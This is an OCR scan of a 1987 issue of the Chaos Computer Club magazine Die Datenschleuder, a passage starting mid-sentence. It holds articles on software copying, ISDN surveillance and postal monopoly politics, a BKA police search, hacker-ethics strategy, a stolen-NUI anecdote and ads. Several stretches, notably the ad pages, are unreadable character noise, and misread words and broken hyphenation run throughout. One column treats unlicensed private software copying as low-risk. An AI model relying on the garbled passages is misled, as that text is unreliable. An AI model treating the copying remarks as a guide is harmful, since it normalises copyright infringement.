bleme. Nur; wen interessieren die? Wer sich nicht
erwischen lässt, hat nichts zu befürchten. Die Fälle,
in denen private Kopierer, die nicht mit geklauter
Software gehandelt haben (was ich übrigens ableh-
nc) kann mensch an den Fingern einer Hand ab-
zählen.
Also alles in Ordnung? Fast. Der Kopierer hat leider
immer noch oft das Problem, an Dokumentation
heranzukommen. Oft rennt er zum Kopierladen oder
kauft Bücher aus der oben erwähnten Buchreihe.
Warum findet sich nicht mal jemand, der zu be¬
kannter Standardsoflware Dokumentation auf Dis¬
ketten vertreibt, die einfach mit der Software zu¬
sammen kopiert werden kann? Technisch ist das
doch überhaupt kein Problem. Hier muß ncxih ein¬
iges passieren. Mich interessiert auch, wie andere
über dieses Thema denken: Beiträge erwünscht.
Caesar/Stoepsel
CUNCH/DS-RED/CAESAR/02.10.87/19:54/7438Z.
21
Goldenes Kalb
Zurrr Querfunkratschlag in Berlin
Der folgendeText ist eine Kritik zu einem Beitrag
für die Veranstaltung “Informationsgesellschaft
- das goldene Kalb der POST-Moderne“ am
Sonntag, 6.9.87 neben der Funkausstellung. Der
Beitragselberliegt nur in gedruckter Form vor,
unsere Kritik ist aber auch aus sich selbst heraus
verständlich.
ZuB.l.b)
Die “Verheimarbeitung“ der Arbeitnehmerschaft
wird nicht durch die Verhinderung einer Einführung
neuer Kommunikationstechniken erschwertfun-
möglich gemacht. Im Gegenteil: Mit der existenten
Technik kann der Anteil der Kommunikationsko¬
sten an den Heimarbeitsplätzen ohne Schwierig¬
keiten “aus der Portokasse“ bezahlt werden und wird
durch ISDN voraussichtlich nur teurer.
Die Schwierigkeiten liegen in den Bereichen der
Organisation und MitarbeiterfUhrung, bzw. bei den
heutigen Unternehmensstrukturen sind “Heimar¬
beitsbüros“ meist zu teuer und insbesondere gelingt
es noch nicht, durch die Netze ein ähnlich dichtes
Geflecht von Informationsdynamik (Klatsch!) zu
schleusen, wie in einer Bürogebäudesituation mit
gemeinsamer Kantine - und das wird nach unseren
Kommunikationserfahrungen in den Netzen glück¬
licherweise auch nie möglich sein. Es stellt sich
nämlich heraus, daß die Medienspezifik der digita¬
len Kommunikationstechnologie weitgehend uner¬
forscht ist und hier auf Kapitalseite erheblich über¬
zogene Erwanungen bestehen, die sich auf Kriti¬
kerseite in erheblich überzogenen Befürchtungen
spiegeln. Siehe hierzu; “Telehcimarbeit ist kein Ren¬
ner“ in “Die Angestellten“ der DAG vom 7.8.87.
Das Argument, daß durch die digitale Verheimar-
beitung die gewerkschaftliche Organisation ge¬
schwächt wird, stimmt nur teilweise. Klassische
Heimarbeitsplätze - mit der bekannten fast-
Unmöglichkeit gewerkschaftlicher Organisation -
zeichnen sich dadurch aus, daß die Heimarbeiter nur
durch persönliches Erscheinen an der Haustür er¬
reichbar waren. Dies ist nun aber - durch das Netz-
nicht mehr der Fall und macht ironischerweise ge¬
werkschaftliche Organisation einfacher als früher.
Statt sich zum Abliefem eingegebener Texte in den
Rechnendes Arbeitgebers “einzuloggen“, kann sich
der Heimarbeiter genausogut in eine Mailbox seiner
Gewerkschaftsgruppe einwählen. Damit wollen wir
nicht sagen, daß dadurch gewerkschaftliche Orga¬
nisation besser/einfacher wird, die Situation ist je¬
doch nicht so hoffnungslos, wie das oft dargestellt
wird. Es ändern sich halt - technologiespezifisch -
gewerkschaftliche Organisationsformen genauso,
wie sich auch die Produktionsformen verändern.
Bewußtseinsmäßig ist hier nur dieKapitalseitc in der
Problemerkennung wesentlich weiter.
Erfahrungen in England zeigen übrigens, daß re¬
gionale Vorortzentren für Verwaltungstätigkeilen
entstehen, die von mehreren Firmen gemeinsam be¬
trieben und unterhalten werden und in letzter Kon¬
sequenz zum “mietbaren“ Büro führen, wie dies vor
ca. einem halben Jahr vom SPIEGEL aus Hamburg
berichtet wurde.
Zu B.l.c)
Wiederum der gleiche Denkfehler der Autoren. Um
alle die prognostizierten Entwicklungen im Dienst¬
leistungsbereich eintreten zu lassen, braucht es kein
ISDN, das geht VON DER TECHNIK her bereits
heute über Telefonleitungen. Was fehlt, sind die
“Programme“, das Know-How, wie sich solche
Dienstleistungen maschinisieren lassen. Es sind die
“Hacker“, die sich dieses Wissen heute spielerisch
aneignen, mag es ihnen auch nicht bewußt sein. Und
schon bald werden einige dieser Zunft ihre Erfah-
mngen verkaufen. Außerdem sollte man in Betracht
ziehen, daß auch “den Kapitalisten" inzwischen
deutlich wird (wofür sind schließlich die Horden von
Psychologen nach ’69 ausgebildet worden...),daß es
so etwas wie “Psychoarbeit“ gibt - Stichwort: Ver-
kaufsfbrdemde Maßnahmen, “human touch“ (siel).
Anzumerken ist, daß ein Dienst wie BTX, der eine
deutliche Trennung zwischen Anbieter und Kon¬
sument macht, für den Konsumentenextremim Preis
heruntersubventioniert wird, während ein Dienst
wie DATEX-P, der insbesondere für die interna¬
tionale Vernetzung von Einzelnen und Gruppen gro¬
ße Bedeutung hat (zB. PeaceNet in den USA bzw.
GreenNet in GB), im Vergleich zu anderen Ländern
sehr teuer ist. Damit pflegt die BP über ihre Ge¬
bührenpolitik den Provinzialismus.
SiilcnSd)Iciibcc
ZuB.2
Hier kommen die Autoren uE. endlich an den Kern
der ISDN-Problematik. Die Mißbrauchsgefahren,
die in dieser zentralisierten “eierlegenden Kommu¬
nikationsmilchsau“ liegen, lassen die Herzen von
Pinochet über Jamselzki bis George Bush schneller
schlagen. So, wie ISDN heute durch die CCli'l
standardisiert ist, wird es keine anonymen Anrufe
mehr geben. In der Beziehung ist auf der politischen
Ebene bisher kein Problembewußtsein entwickelt
und die Techniker argumentieren Morgenstemmä-
ßig; Es kann nicht sein, was nicht sein darf. Für die
Ablehnung von ISDN finden sich sogar Bundesge¬
nossen in der Mailboxindustrie, zumindest beim
politisch bewußten Teil derselben. Noch einmal; aus
technischen Gründen ist ISDN nicht notwendig. Die
einzige Rechtfertigung dafür liegt in den Kapital-
verwertungs/Neuinvestitionszwängen der Elektro¬
nikindustrie.
Zu B.2.b)
Zum Abspeichern der Gespräche: Dies ist digital zu
teuer, da durch die Digitalisierung das zu spei¬
chernde Datenvolumen gegenüber analogem
Dampftonband zu stark aufgebläht wird. Gefährlich
ist in dem Zusammenhang jedoch, daß die Digita¬
lisierung aller Signale einen Schritt näher an auto¬
matisierte “Reizworterkennungsautomaten“ führt,
die dann - in einer Hierarchie steigender “Wichtig¬
keit“ - automatisch bestimmte Gespräche zur Auf¬
zeichnung ausdem Telefonverkehr “herausfischen“.
Aberauchdasist nichtsNeues und wird heute bereits
praktiziert. Einfacher wird durch ISDN das Mithö¬
ren, Mitschneiden und Analysieren von Textkom¬
munikation (zB. TEXTOR Programmpakei des
BKA). Einziger Schutz - und das wird auch aus
industriellen Interessen intensiv entwickelt - ist die
Verschlüsselung aller Daten, die über irgendeine
Leitung gesendet werden.
Folgendes ist wichtig zu wissen: Nach Tschernobyl
wurde kein Katastrophenalarm ausgelöst, so daß
potentiell noch alle Telefone funktionierten und
nicht nur die rot markierten für den Krisenfall. In
ganzen Regionen brach deshalb der Telefonverkehr
wegen Überlastung zusammen, so daß das Telefon¬
netz nicht mehr zum Krisenmanagement taugte.
Daraufhin ist auf Kabinettsebene beschlossen wor¬
den, in Zukunft das eigentlich veraltete, digital ge¬
schaltete DATEX-L Netz als Notstandsnetz wei-
Soicnä(f)lciii)cr
terhin - parallel zu ISDN - auszubauen. An die,sem
Netz wird TELETEX als eine Art modernes TELEX
be trieben.FürsolcheSituationenistDENGRÜNEN
in Bonn eine partielle Teilnahme an PARLAKOM
zu empfehlen, da im Rahmen von PARLAKOM
geplant ist, die Heimatwahlkreise der Abgeordneten
via TELETEX mit dem jeweiligen Abgeordneten¬
büro in Bonn auf Kosten der Steuerzahler zu ver¬
binden. Damit wäre dann im Katastrophenfall eine
eigenständige Informationsmöglichkeit “von der
Basis“ins “Raumschiff Bonn“ gegeben. (Siehe dazu
auch: 'STUDIE’ für den geplanten Computereinsatz
der Fraktion DIE GRüNEN im Auftrag des Deut¬
schen Bundestages, Verlag Der Grüne Zweig, Nr.
117)
Ein Vergleich mit der Plutonium wirtschaft geht fun¬
damental am Wesen der Rechnervemetzung vorbei.
Eine Plutoniumwirtschaft ist extrem schutzbedürf¬
tig auf Grund eines materiellen “Plutoniumhau¬
fens“, der physikalisch an genau umgrenzter Stelle
vorhanden ist und damit mögliches Ziel terroristi¬
scher Angriffe darstellt. Demgegenüber zeichnet
sich eine weitergehende Computervemetzung da¬
durch aus, daß das Gesamtsystem immer redun¬
danter d.h. (zer)störungsunanfälliger wird. Ein aus¬
gefallenes Rechenzentrum kann innerhalb von Mil¬
lisekunden durch Rechenkapazität an anderer Stelle
ersetzt werden - dank der Vernetzung. In diesem
Sinne wird von den Netzarchiiekten durchaus schon
in Begriffen von “Dezentralisierung“ und “Redun¬
danz“ gedacht - ganz im Gegensatz zur Strommafia.
Vor zwanzig Jahren hätte die Bombe im Rechen¬
zentrum des Springer Verlags 2 - 3 Jahre Arbeit
zunichte gemacht, wenn sie nicht nur eine Klo-
schüssel, sondern Plattenspeicher zerstört hätte. Die
Zeiten sind jedoch lange vorbei und beim letzten
Druckerstreik haben sich - dank Rechnerverbund -
kanadische Dmcker als Streikbrecher einsetzen las-
Aspekte einer politischen Debatte zu ISDN
Zur Zeit wird an der Zerschlagung der Bundespost
als Kommunikationsmonopol gefingert. Siehe dazu
die Dokumentation in der SZ Nr. 174 vom 1./2.
August 1987 zu “Feststellungen und Empfehlungen
der Regierungskommission“. Die Hauptinteressen
dabei sind uE. winschaftlicher Natur unter dem
Motto “Gewinne privatisieren, Verluste sozialisie¬
ren“.
23
Nach Einschätzung der Postgewerkschaft ist in Zu¬
kunft wahrscheinlich mit folgender Situation zu
rechnen;
- Die Post wird aufgeteilt in unabhängige Verwal¬
tungsbereiche für den gelben und grauen Bereich.
Beim grauen Bereich verbleibt das Netzmonopol.
Ein Minderheitenvotum, auch mindestens einen pri¬
vaten Netzträger zuzulassen, fiel mit immerhin 6:6
Stimmen äußerst knapp aus.
allen elektronischen Netzen besteht, die nach unse¬
rer Einschätzung die Mißbrauchsgefahr erheblich
einschränkt bzw. diese Infrastruktur als Beherr¬
schungsinstrument wenig tauglich macht.
KlausSchlelsIek, Reinhard Schrutzki, Jürgen Wieck¬
mann, Tom Todd, Thomas Esher, Udo Schacht
Mitglieder Im Arbeitskreis Politischer Compute-
relnsatz (APQC)
- Nur die BP ist Berechtigt, den Telefondienst an¬
zubieten, jedoch endet ihr Monopol an der An¬
schlußdose.
- Die 'Mehrwertdienste' Datex, Telex, Teletex, Te-
mex (die ‘‘ex“-Dienste) und der Endgerätemarkt
werden zu 50% der BP belassen, der Rest dem Markt.
Weder für die BP, noch für die freien Anbieter gibt
es irgendwelche Auflagen, und die freien Anbieter
müssen sich die benötigte Leitungskapazität beim
grauen Monopolisten mieten/kaufen.
- Es wird Privaten gestattet, eigene Grundstücke
selber für die interne Kommunikation auch Uber
andere Gmndstücke hinweg zu verkabeln.
Dies bedeutet keine änderung für die bürgcrrechis-
relevanten Aspekte von ISDN gegenüber der jetzi¬
gen Situation. Auch in Zukunft soll ein Monopolist
der Betreiber des geplanten ISDN Netzes sein.
Nebenbei: Die Essenz des Machtanspruchs der DBF
leitet sich daraus ab, daß es gesetzlich verboten ist,
Kommunikation über Qrundsiücksgrcnzen hinaus
von irgendjemand anderem als der Post machen zu
lassen. (Sonderfall Bundeswehr). Die Bundesbahn
hat nur deshalb ihr eigenes Tclcfonnetz, weil ihr
“Grundstück“ sich über die gesamte Republik er¬
streckt. Ich halte es im Sinne von Dezentralisierung
und Basisdemokratie für eine grüne Forderung, die
Legalisierung der “Verkabelung“ im Rahmen der
Nachbarschaftshilfe zu fordern. Unseres Erachtens
ist nicht die Vernetzung an sich der Sündenfall,
sondern die Monopolisierung der Netzträgerschaft.
Auch nach der heraufdämmemden Neustrukturie¬
rung muß bei einem Mißbrauchsversuch nur eine
Stelleusuipiertwerden.Daskontrastiertimmernoch
erheblich mit der Situation in den USA, wo auf
Grund des Fehlens eines Monopols jenseits der gel¬
ben Post eine wahrhaft chaotische Situation in fast
24
ks 251950 Aug 87 BEREICH APOC BAG QUER-
FUNK.KRT
CLIN CH/PÖLITIK/KS/2S.08.87/20:12/11558 2.
GEMEIN
Diese kleine unbedeutende Geschichte passierte
vor zweieinhalb Jahren. Erst heute ward sie mir
zugetragen und wir wollten den Daten nicht glau¬
ben, die uns unsere Ohren ins Hirn spielte.
Da gab es in un.serer kleinen 'Galerie' eine kleine
Vorstellung des Chaos Computer Clubs. Es war
nette intime Atmosphäre bei Mandarinen und Ap¬
felmännchen. Nie waren mehr als 10 Leute gleich¬
zeitig anwesend, aber da keiner der Kiddy-Craclcs
eine offizielle Leih-NUI hatte, war Not am Mann.
Die Veranstaltung drohte langweilig zu werden. Und
jeder neue Besucher wurde erst mal nach einer NUI
gefragt. Und tatsächlich: Als schon keiner mehr dran
glaubte, betrat ein netter junger Mann unsere Räume
und nickte. Ja, er habe eine NUI und sei auch bereit,
sie zur Verfügung zu stellen. Klasse. Und als er sie
in die Tastatur tippte, schauten alle weg. Wir haben
von ihm nie wieder etwas gehön. Den Grund dafür
erfuhren wir erst jetzt; Die Rechnung, die die Post
ihm pünktlich später aufmachie, belief sich auf etwa
7000 DM.
Haben wirklich alle weggeschaul? Egal ob Biele¬
felder oder Hamburger, Es ist einfach schweinisch,
die NUI einer Privatperson als Leih-NUI zu ver¬
wenden! Und wir sind nun solidarisch sauer. Mit
zweieinhalb Jahren Verspätung. Davon kann sich
unser Bielefelder Besucher nichts kaufen. Weitere
Worte will ich mir sparen. Weder was von Moral auf
der einen noch ’Confldenza' auf der anderen Seite -
auch nix von Vorsicht und Datenhygiene/hyste-
rie/hyäne. Ein jeder beantrage seine NUI selbst bei
der POST.
CLINCH/DS-RED/PADELUUN/04.10.87/22;24/1617Z.
Sitileiildjieuker
PRAKTISCHE
CHAOS-MARIE
mit PETE CARROLL (GB) und FRATER V.'.D.'. (BRD)
SEMINAR:
"CHAOS-MAGIE UND FREISTILSCHAMANISMUS"
Aach benährter Art »erden die Teilneliier in den fünf chaosiagiscben Grunddisziplinen
Divination, Involtation, Evokation, Zauberei und Ilhsination ausgebildet, das Srlern-
te »ird in der Praxis geprüft. Bs handelt sich also ui eine echte Einweihung in den
Energiestroi der undogiatischen lodernen Chaos-Kagie. Für Anfänger wie für Fortge¬
schrittene geeignet.
i
Aus dei Prograii: Kagischer Paradigienwechsel in der Praxis * die Prinoipia Hagica,
die Grundstrukturen der Kagie * schaianische Praktiken und loderne Technologie * cha-
oistische FaBpfaagie * Quantenzauber • der Technofetisch ‘ Atavissus und Trauuarbeit
* die Erschaffung von Psychogonen ‘ Chaos-Äagie und Gruppenarbeit ‘ praktische Ein¬
weihung ‘ Kraftübertragung und Fraftabzug ’ Chaos-Magie und Funenarbeit * das lagi-
sche Pentathlon ‘ aagisches Schaltkreistraining * Arbeit »it dej Chaos-Scbiri '
Heilungs- und Sprengglyphen * die Nacht des Schreckens ' die Messe des Chaos u.a.a.
I
Seainarteriine: 05.-08. Juni 1987; Sealnarort: Nähe Bern/Schweiz
S eainarqebühr : DM 560,- (Anzahlung; DM 260,-, Rest bei Seainarantrittl
Strikte legrenzong der TeilnehaerAalil - daher baldige Anieldung eipfohlen!
Bitte beachten: Pete Carroll und Frater V.-.D. , führen jedes Seiinar insgesait nur
drei Mal durch, ub eriüdende Fliejbandroutine zu verleiden. Dieses ist die zweite
Veranstaltung, also die vorletzte Chance für Sie, aa Seiinar 'Chaos-Magie und
FreisCilschaBanisius' teilzunehBen.
ß(JS:
i:ii:rscttnJFr ri/A
I “/ar
amige
Snlcnärfjfciibcr
Dl« HAtkerbib«!, Ted tui
041 oscutelirtiat Nia«aitirMtrt tdr H«ait und iftiat,
ae tl w«TleB oraUca Teile «ca aod f(b tlider. OeliuaeBUaaa,
HeiDUBtet. LcaeuhiU«, Ltitiptti.
Am dem libitc du Bmic-Cedkfil * Ncum mo CCC ‘ Otr Cedi
dm HaSpa* Coups * Cempater & leoiiilrer Saat * Satellit«»-
hiaiAf * nsd * uad * usd ..
2ia SaiitBOla A4 ISBN Mnm-W-t CMacrZwtU
SmOl« lü des (tpUaitB Compiiiiciaiaa d«r ^aknaa TSO
’Dit GnineD’ m Asftiaa des Dieiiaee Guadistades
OwKiBlüfUi artCOBMWTwABie ttiUJiiw ncS eil a*«dria«« lA
RecBlStlbtl lor «e» nantea Unaaa« um du Pelon t M
uBdasdcriaABitpeiiDBtB leune lasonieaaea.
Ce (UUf lii ADe, Aa b«i Wahneftauod itrtr deD«-
UaasektB Btc&ii tat rcAoiee Um«b| e<t siAOttdiaa
W« SiBseccBMikraseadUj und Valfcdrrätihnij
tun kSnsda.
Sa piaknsekai Raqebei fOiaile. die sieb fflfl der Volks-
imd d»B laait «iibuBdetai BecaisftefeleDcct
Inldpiknl 1 • Cnapulimm •
Bau OaktsBiBUBaa vei S.W«r»irr. die das fktma
CgBpiUtnveBaiuiiikrbek htliuekiei Das loiopalai
kmttbl aus iiBcr H9-Dm Ikskani S1/4* ailfiBtn
□ ■■•.VriS i»MB JM SB DekaAttijOBBStesK
Aufbtcker'AcbniA«, AkbliKlahr'
Oia A4 • Boies aiiM Baemra. uAieiaiuncA pestiei»
M M) M 1-MArra mif mmtm P<« <A>Wb. au beMkUatifi n«ia4ati ai
w arr AentUiaa Pm^SK»« aie*>mii»lu knekkiBttl *a(t Mkf. «(Bl Mita«! mc
al luai ivrlaa. »u «rTtiMt eaaa ai* InwUtji« u«n> u* ■ e ali f« «»4 iw a» Ar
BiUavruia« tti. AAan »«■ t<d «(Shn» teBt>a0UnR. otu luder* «»u m
Oft.’CLe
IMPRESSUM
Oie Datenschleuder Numero 23 - Oktober
1987
Das wissenschaftliche Fachblatt für Daten¬
reisende
D-2000 Hamburg 20
Schwcnckestrasse 85
Geonet: Geol;Chaos-Team
CLINCH: Chaos-Team
Btx : »Chaos#
tel: 040-4903757 / 040-483752
Herausgeber CCC e.V.
ViSdP: Reinhard Schrutzki
i Mitarbeiter (u.a.):
IDDT, A. Eichler, P. Franck, H. Grusel, Henvart
iHolland-Moritz, jwi, KS, M. Kuehn, Andy M.-M.,
jj. Nicolas, padeluun, Poetronic, S. Stahl, S. Wer-
inery, TAM.
I I
INachdruck für nichtgewerbliche Zwecke bei Quel-j
Jlenangabe erlaubt. |
Jübeiraschter GesichtsausDrack im Selbstverlag. •
|Iulil987 »•---■• /
You should not...
Hiermit möchte ich alle Datenschleuder-Leser drin¬
gend davor warnen, die Telefonnummer 00490811
resp. 00490811 zu wählen. Nach dem Wählen der
Nummer liegt bis zum Unterbrechen der Verbin¬
dung (sprich auflegen) ein ca. 0,8 Sekunden-
Gebührentakt auf der Leitung, der zur Folge haben
könnte, daß die Telefonrechnung rasant ansieigt.
Und das muß doch wirklich nicht sein, oder?
198709271400 TELWDS23.DOC Ls 16
CUNCH/SYSOP/GAST/27.09.87/18;34/469Z.
KURZ VOR SCHLUSS
27.10.1987 - Neoe BKA-Aktlon
Dlesoi«! wg. KASA
Das BKA Ist zti dl«ser Stande mal wieder
tMIg. Nachdem man noch mehr ala ela Jahr
gebraoeht hatte, um In Sachen CERN/PHILIPS
gegen die Falschen loszaschlagen and gegen
vier CCC'MRglleder za ermitteln, geht es In
der NASA-Sache o/fenhar schneller. Sieben
Beamte des BKA ond der Hambnrger Kriminal¬
polizei durchsuchen derzeit die Privatwobnnng
eines CCC* Mitgliedes wegen des Verdachts
der Ausspähung von Daten (§202 a StGB).
Der seinerzeit gelnBerte Verdacht, die BKA--
AktloD in den Räomen des CCC e.V. and
zweier Vorstandsmitglieder habe nur dazu
gedient, sich eine GrDoddatensaniiBlung zu
verachaffen, um ln anderen Pillen besser
ermitteln zn können, scheint sich za bestitl-
gen. Unklar ist, wer Urheber dieser neuen
BKA-Aktlon lat, denn der §202a StGB kann
nor angewandt werden, wenn ein BetrofFener
Anzeige erstattet. Die Staatsanwaltschft kann
nicht von sich aas tätig werden.
nie.k ils kurze direkte Information, eine offi¬
zielle Presseerklärung des CCC folgt In KUrze.
Cl.;NCH/CHAO5/'SYSOP/27,l0.87/l8.O6/97f Z.
Termin
Am Wochenende 6.77. Dez. findet jeweils ab 10;00
in den Räumen des FORBID eV (040-439 2336) eine
Vorbereitungstagung füreine internationale Tagung
im Oktober '8B zum Thema “3. Welt und neue
Technologien“ statt.
SntcnSdjlcubcr
Postvertriebsstuck
C9927F
3ic ^oienSi^Iettbct “ ’
Das wissenschaftliche Fachblatt für Datenreisends
Ein Organ des Chaos Computer Club
Editorial
In einer Billstedter
Küche kommt NDR 2
aus einem Topfdeckel
Kopfschüttelnd steht Christian Wolany
(42) in seiner blitzblanken Einbauküche.
„Ich habe einen ganz normalen E-Herd -
und aus dem kommt Musik" sagt er. Tat¬
sächlich. Obwohl nirgendwo in der Woh¬
nung ein ^diogerät eingeschaltet ist, er¬
tönt leise Musik. Sie schallt aus einem
Topfdeckel, der auf dem Rand zwischen
Herd und Edelstahlspüle liegt.
„Ich hab’ in meinem Leben ja schon viel
erlebt, nun glaube ich aber bald an Ge¬
spenster", sagt der Hausherr.
Seit Mai 1987 leben Christian Wolan.v
und seine Lebensgefährtin Brigitte Win¬
terlich (40) in der Dreizimmerwohnung
am Rantumer Weg in Billstedt. Unerklär¬
liche Dinge waren ihnen noch nie aufge-
failen. Doch nun scheint es im zweiten
Stock des Neubaus zu spuken.
Hobbykoch Wolany hatte seiner Freun¬
din versprochen, das Abendessen zu be¬
reiten. Bratwurst mit Brokkoli und Kar¬
toffeln standen aufdem Speisezettel. „Ich
arbeitete wie immer am Herd und habe
alles vorbereitet. Als ich dann die Kartof¬
feln abgießen wollte, dachte ich; Entwe¬
der bist du bekloppt, oder so was gibt es
wirklich", sagt Christian Wolany. „Aus
dem Deckel des KartofTeltopfes, den ich
auf den Herd gelegt halle, ertönte klar das
Programm von NDR 2." Auch seine
Freundin und herbeigemfene Nachbarn
wollten ihren Ohren nicht trauen. Deut¬
lich konnten sie die Sendung aus dem
weißen EmaiUedeckel hören. Ein Scherz
war es auch nicht, denn weder im Herd
noch ln der Spüle odereinem der Schrän¬
ke war ein Radiogerät versteckt. Wie aber
)ünn das funktionieren?
Eine Antwort hat die Sendetechnik des
NDR. Sie lautet: Unter bestimmten Be.
dlngungen kann es Vorkommen, daß sich
Ln mushalten ein sogenanntes Ersatz¬
schaltbild aufbaut Irgendein Metallge-
genatand wird dabei zur Antenne, ein
anderes MÖbelstüek aus Metall über*
nimmt die Aufgaben eines Gleichrichters,
ein drittes Teil schließlich schwingt wie
die Membran eines Lautsprechers.
Bel Christian Wolany spukt es also
nicht Sein Herd oder die Spüle empfan¬
gen als Antenne das Mittelwellenpro-
graznm des NDR vom nur etwa drei l^o-
meter entfernten Sender Moorfleet Eines
der beiden Küchenmöbel wandelt die
HochA^uenzv/ellen um, der Topfdeckel
spielt schließlich den Lautsprecher.
Ein ausgesprochen seltener Vorgang,
physikalisch aber zu erklären. HO
So komm! Muslh (n den Topfdeckel: Oer Sender atrohlt dot
Programm ob, Spüle und Herd wirken alt Antenne und
Gtelchrlchter. der Decket alt Loutiprecher 2*(chnung mickacus
Don’t unk - f unk _
Funkgeräte fUr CCCongress benötigt
Zur Cewährlelstung der Sicherheitsma߬
nahmen auf dem Congress wäre es hilf¬
reich, wenn sich zur Verfügung stellende
Sicherbeitskräfte (also Chaos-Dienstler)
legale CB Funk-Geräte sowie ein kleines
Sortiment an Quarzen mitbringen wurden.
Konkret geht es darum, im Eidelstedter
Bereich einen Überblick über eventuell
vorhandene (Truppen-) Bewegungen von
gewissen "Ordnungskräften" zu behalten.
Im Rahmen unseres Frühwarnsystems wird
dies leider nötig sein...
Andy
198712121942 CONGR-CB DOC L» 16
<?v£AC.£;
H4n»mtr6*- AittJiSCATT
,y^SUOESH£-,A,
1 Start der
^Datenusrarbeifungi
k am Poatschalterj
Handwerbestempel zum Start der Schalterterminalsystema
Salcnäifjlcubtr
Offene Netze - Jetzt
Eine Analyse über Denkstrukturen und Stra¬
tegien
Daß der NASA-Coup nachhaltige Veränderun¬
gen in der Hacker-Szene bewirken wird, war
schon klar, als die Geschichte noch nicht in der
Öffentlichkeit war. Die Eimittlungsbehörden
reagieren entsprechend der schon vor Monaten
angestellten Planspiele. Behörden sind relativ
leicht berechenbar. Allerdings halte man mehr
Intelligenz und subtileres Vorgehen unterstellt.
Stimmen die Informationen, die die in.stallierten
Meßfühler signalisieren, scheint nicht nur das
Wissen um technische Zusammenhänge unter
dem angenommenen Knowhow zu liegen. Viel¬
mehr scheinen die Eckpfeiler der strategischen
Planungen der Ermitllungsbehörden aus Zeiten
zu stammen, die die gesellschaftlichen Verände¬
rungen durch die Computertechnik nicht be¬
rücksichtigt.
Gleichzeitig reagieren auch Teile der Szene nach
veralteten Strategien. Platt gesagt: Nach dem 68er-
Mustcr wird eine kapitalistische Übermacht unter¬
stellt, für die der Staat Bütteldienste leistet, mit dem
Ziel, die kleinen Leute an die Kandare zu nehmen
und das Volk zu unterdrücken. Darüber kann jeder
Staatsanwalt nur lachen und ohne Schwierigkeiten
das Gegenteil beweisen. Ein oberflächlicher Blick
auf die Tätigkeit des Kartellamtes reicht aus. Die
Frage, was passiert wäre, wenn nicht beim CCC,
sondern bei IBM durchsucht worden wäre, ist ent¬
sprechend einfach zu beantworten. Statt in Plastik¬
säcken hätte man das sichergestellte Zeug in LKW’s
abu-ansportieren müssen.
Alter Wein für alte Schläuche
Analysiert man den Duktus mancher Kommentare,
die sich kritisch mit der BKA-Aktion auseinander¬
setzen, wird ersichtlich, warum bisherige Revolu¬
tionen immer ihre eigenen Kinder gefressen haben.
Es werden lediglich Machiverhältnisse umgekehrt,
doch die Denkstrufctur veränderte sich nicht. Um das
plastisch zu machen, hier einige Sätze aus einen
Kommentar im (CLINCH-)Brett Rechiswesen:
(“BKA rptiert..“) - allerdings mit vertauschten Rol¬
len.
- 2. Absatz: “Das Vorgehen der Hacker halte ich
inzwischen für unverschämte Übergriffe. Dies ist
nicht nur ein persönliches Problem eines Roy Om-
mond. Hier wird ein Präzedenzfall geschaffen.
Wenn es uns nicht gelingt, dem CCC und den Hac¬
kern von Richtern erheblich auf die Finger klopfen
zu lassen, dann werden die Aktivitäten der Szene
künftig immer nach gleichem Verfahren ablaufen. “
(...)
- 5. Absatz: “Ich glaube, daß dies inzwischen ein Fall
für den Verfassungschutz i.st. Ich denke, daß über
diese Schiene kompetente Experten zu finden sind,
die Erfahrungen und Verbindungen haben, um den
durchgeknallten Hackern die Rote Karte zu zeigen.
Und ich denke, daß es jetzt Aufgabe des BKA ist,
diese Gegenmaßnahmen zu koordinieren" (..)
Ersetze nun..
“Hacker“ durch “Staatsanwaltschaft"
“Roy Ommond" durch “Wau Holland, Steffen Wer-
nery“
nuk (^frnatn ktku
I am the ercator of darkness
S)ntcnSd;lcubcr
Seite 2
Seite 3
“CCC‘ durch “BKA"
“BKA“ durch “CCC
“Szene“ durch “Ermittlungsbehörden“
“VS“ durch “Humanistische Union“ (= Zusam¬
menschluß von Demokraten, die sich für die Bür¬
gerrechte cinsetzen, zum Schutz vor Übergriffen des
Staates gegen diese Bürgerrechte.)
..und schon sind die Kemaussagen des Orginals
wieder hergestellt.
Analysen, die von dieser Denkstruktur beeinflußt
werden, führen zum Krieg - zum Krieg zwischen
Etmitllungsbehörden und Hackern, wobei die Hac¬
ker auf technischer Ebene die besseren Karten haben.
Aufrüstung zum Informationskrieg
Im Informationskrieg mit dem BKA werden die
Hacker mit Public-Key-Schlüsseln aufrüsten. In
zwei, drei Jahren wird es kaum noch Festplatten ohne
verschlüsselte Files geben. Gleiches gilt für die
Mailboxkommunikation. Spätenstens an dieser S tei¬
le kann das BKA einpaoken, die Vorstellung ist
gelaufen.
Aber auch das, was bei einigen als Hackerethik in
den Köpfen steckt; Offenheit und freier Zugang zu
allen Informationen für alle. Davon später mehr.
Für’s BKA stellen sich schon jetzt folgende Pro¬
bleme (*);
- die Quantität der zu sichtenden Informationen und
des Datenmülls bringen die Ermittlungen ins
Schleudern.
- Der Soft- und Hardwaremarkt mit ständig wech¬
selnden Systemen und Konfigurationen ist derart
unübersichtlich, daß ihn niemand überblicken - ge¬
schweige denn, kontrollieren kann. Die paar 100
Megabyte die zur Zeit durchgeflöht werden, sind nur
ein kleiner Vorgeschmack dessen, was bei dieser
BKA-Strategie zu leisten wäre.
- Die Ermittlungsbehörde muß im nachhinein ge¬
gebene Programme und Strukturen analysieren, was
bekanntlich weitausmehr Know-How erfordert, als
diese Programme und Strukturen zu entwickeln.
Platt gesagt, die Abteilung “Computerkriminalität“
im BKA müßte knowhow-mäßig um einige Pro¬
zentpunkte besser sein, als diejenigen die sie fangen
will, was, bezogen auf die Hackerszene, ein aus¬
sichtsloses Ansinnen ist.
- Das BKA wird sich bei einer Verfolgung der
falschen Leute dermaßen blamieren, so daß die
Chancen zur Eindämmung wirklich bedrohlicher
Computerkriminalität um Jahre verspielt werden.
(*) Diese Aussagen dürfen auch ohne Nennung der
Quelle in geheimen Strategiepapieren des BKA ver¬
wendet werden)
Die oben angedeutete Denkstruktur impliziert ver¬
altetes Freund-Feind-Denken, das am Ende in einem
Psychokrieg endet, wobei auf DIESER Ebene die
Ermittlungsbehörden mittelfristig die besseren Kar¬
ten haben. Doch was kommt dabei heraus?
Planspiel Version BKA 2.4
In der ersten Phase kann sich das Katz-und-Maus-
Spiel zwischen BKA und Hackern zur Unterhal¬
tungsshow für die Nation entwickeln. Das BKA
sammelt dabei Know-How und läßt sich dafür auch
gerne ein wenig verarschen, denn jeder Fehler, jede
Peinlichkeit enthält gleichzeitig unbezahlbares Wis¬
sen. Die Hackerszene hat ihren Spaß und der Anteil
